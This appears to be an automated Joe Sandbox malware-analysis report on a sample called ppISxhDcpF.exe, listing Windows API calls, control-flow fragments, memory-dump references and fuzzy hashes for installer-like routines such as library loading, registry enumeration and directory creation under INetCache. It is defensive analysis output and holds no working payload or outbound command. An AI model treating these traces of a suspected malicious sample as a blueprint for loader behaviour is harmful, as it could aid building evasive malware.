                                                                                                                • API String ID: 1716503409-1331003597
                                                                                                                • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                                • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                                • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 1096 4063bf-4063df GetSystemDirectoryW 1097 4063e1 1096->1097 1098 4063e3-4063e5 1096->1098 1097->1098 1099 4063f6-4063f8 1098->1099 1100 4063e7-4063f0 1098->1100 1102 4063f9-406428 wsprintfW LoadLibraryW 1099->1102 1100->1099 1101 4063f2-4063f4 1100->1101 1101->1102
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                • wsprintfW.USER32 ref: 00406411
                                                                                                                • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                • String ID: %s%S.dll
                                                                                                                • API String ID: 2200240437-2744773210
                                                                                                                • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                                • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                                • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70, 4Wu,?,C:\Users\user\AppData\Local\Temp\,00405866,?,75573420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\ppISxhDcpF.exe"), ref: 00405AC2
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                                  • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00401612
                                                                                                                  • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                                • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor,?,00000000,?), ref: 00401645
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor, xrefs: 00401638
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving\nonactor
                                                                                                                • API String ID: 1892508949-1427884202
                                                                                                                • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                                • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                                • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                                APIs
                                                                                                                • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                                  • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CallMessageProcSendVisible
                                                                                                                • String ID:
                                                                                                                • API String ID: 3748168415-3916222277
                                                                                                                • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                                • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                                • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FEE
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                                  • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,755723A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                                  • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,755723A0), ref: 0040520F
                                                                                                                  • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                                  • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FFF
                                                                                                                • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 0040207C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                • String ID:
                                                                                                                • API String ID: 334405425-0
                                                                                                                • Opcode ID: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                • Instruction ID: 561ed2f99fcd8f3c69216c61aae9e950b585f3ecd418fa9455324ea25216acba
                                                                                                                • Opcode Fuzzy Hash: d6ec45678292224ccfbfce22950c847036d7a08cdbcb07fa7d0387c0f9533a57
                                                                                                                • Instruction Fuzzy Hash: 8221A731900209EBDF20AF65CE48A9E7E71BF00354F20427BF510B51E1CBBD8A81DA5D
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000468,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
                                                                                                                • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Enum$CloseOpenValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 167947723-0
                                                                                                                • Opcode ID: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                • Instruction ID: caa0a88e983a87845293d3a09aded013c5498a2120ee6ea3f3930af667db2d56
                                                                                                                • Opcode Fuzzy Hash: 42b2dd53c8b5802947a3dab0b58a0a50b760338acaf8adbf9a4fd88f57d55a7c
                                                                                                                • Instruction Fuzzy Hash: 9FF08171A00204ABEB209F65DE8CABF767CEF80354B10803FF405B61D0DAB84D419B69
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000), ref: 10002963
                                                                                                                • GetLastError.KERNEL32 ref: 10002A6A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.2008032542.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.2008007393.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008088602.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.2008146266.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_10000000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                • Instruction ID: 77f315af6c145f6c632c2ebe68d3f6cdb0cf0445c85f86b19d364da59c27affc
                                                                                                                • Opcode Fuzzy Hash: 59d19e049e546944b5a660a22879eb7514e0dc07886846df9c342dd830f48687
                                                                                                                • Instruction Fuzzy Hash: 8851C4B9905214DFFB20DFA4DD8675937A8EB443D0F22C42AEA04E721DCE34E990CB55
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,00000468,00000000,00000022,00000000,?,?), ref: 00402CF1
                                                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 0040245B
                                                                                                                • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nscAF7B.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID:
                                                                                                                • API String ID: 3677997916-0
                                                                                                                • Opcode ID: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                • Instruction ID: 28617f4b1a8802b5017de0243b5a45cf97da40b04a50325282b533cdbf166070
                                                                                                                • Opcode Fuzzy Hash: 684252ed4cb5f75002efccf4c3d89688e5a32529c12b8521bce5fdd085325f04
                                                                                                                • Instruction Fuzzy Hash: 64115E31911205EBDB14CFA4DA489AEB7B4EF44354B20843FE446B72D0DAB89A41EB59
                                                                                                                APIs
                                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 3850602802-0
                                                                                                                • Opcode ID: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                • Instruction ID: cd3aabbb77ee63ed71f9921c47df44d3aa6e588553b0b950a072bc92d791a3e5
                                                                                                                • Opcode Fuzzy Hash: 71800ff5d752955c4261f1e4e44e66a702dae3e8c0882f1cfb99089304b670a7
                                                                                                                • Instruction Fuzzy Hash: 2101F4316202209FE7095B389D05B6A3698E710319F10863FF851F62F1DA78DC428B4C
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,?,0040330C,00000009,SETUPAPI,USERENV,UXTHEME), ref: 0040643D
                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00406458
                                                                                                                  • Part of subcall function 004063BF: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                                  • Part of subcall function 004063BF: wsprintfW.USER32 ref: 00406411
                                                                                                                  • Part of subcall function 004063BF: LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 2547128583-0
                                                                                                                • Opcode ID: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                • Instruction ID: 5d7b52194fecd52e31197542c52f699420a2dcfb6f4997f05ddeecd74f4f3bdc
                                                                                                                • Opcode Fuzzy Hash: f58656703257d3684848e4558ce263f5efe09ac277fa21959b5ddbdc7fcd416a
                                                                                                                • Instruction Fuzzy Hash: 70E0863660422066D61057705E44D3763AC9E94704306043EFA46F2041DB78DC32AA6E
                                                                                                                APIs
                                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402E2E,C:\Users\user\Desktop\ppISxhDcpF.exe,80000000,00000003,?,?,00000000,0040353A,?), ref: 00405C2E
                                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,00000000,0040353A,?), ref: 00405C50
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesCreate
                                                                                                                • String ID:
                                                                                                                • API String ID: 415043291-0
                                                                                                                • Opcode ID: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                • Instruction ID: a29eaa7254a97888a18cbfd792fe15e84c6d283973f4e4682f27fdddc38ff468
                                                                                                                • Opcode Fuzzy Hash: c97765c4049bc943dbf434cc8e3c5f5e58d45e95167aa4d8b6d1a3ab64a9aeda
                                                                                                                • Instruction Fuzzy Hash: 71D09E71654601AFEF098F20DE16F2E7AA2FB84B00F11562CB682940E0DAB158199B15
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,00000000,00403293,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405706
                                                                                                                • GetLastError.KERNEL32 ref: 00405714
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 1375471231-0
                                                                                                                • Opcode ID: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                • Instruction ID: 3f205c5890689a668e8791f8cf6ed098ce3dcc56284ebb1818e0a19aeae2b5ff
                                                                                                                • Opcode Fuzzy Hash: 0964e43d4f51b800c832a37fa1186c7301bf32e9249ac1f93b451144f827c630
                                                                                                                • Instruction Fuzzy Hash: DBC04C30225602DADA106F34DE087177951AB90741F1184396146E61A0DA348415E93D
                                                                                                                APIs
                                                                                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,00000002,?,?), ref: 004027A0
                                                                                                                  • Part of subcall function 00405F9C: wsprintfW.USER32 ref: 00405FA9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990626450.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_ppISxhDcpF.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FilePointerwsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 327478801-0
                                                                                                                • Opcode ID: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                • Instruction ID: c5c3fa32fc6d0159c61c67e46e8878479b4609e7a69e49ca0ebb3ecbbe822ed2
                                                                                                                • Opcode Fuzzy Hash: 625ba8c0adf551b09f916d27f71fdaae1f0ecd84ce04db3249cbe24fae782c82
                                                                                                                • Instruction Fuzzy Hash: A0E04F71702514EFDB01AFA59E4ACAFBB6AEB40328B14443BF501F00E1DA7D8C019A2D
                                                                                                                APIs
                                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 004022D4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1990472937.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1990457155.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990496635.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1990510985.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
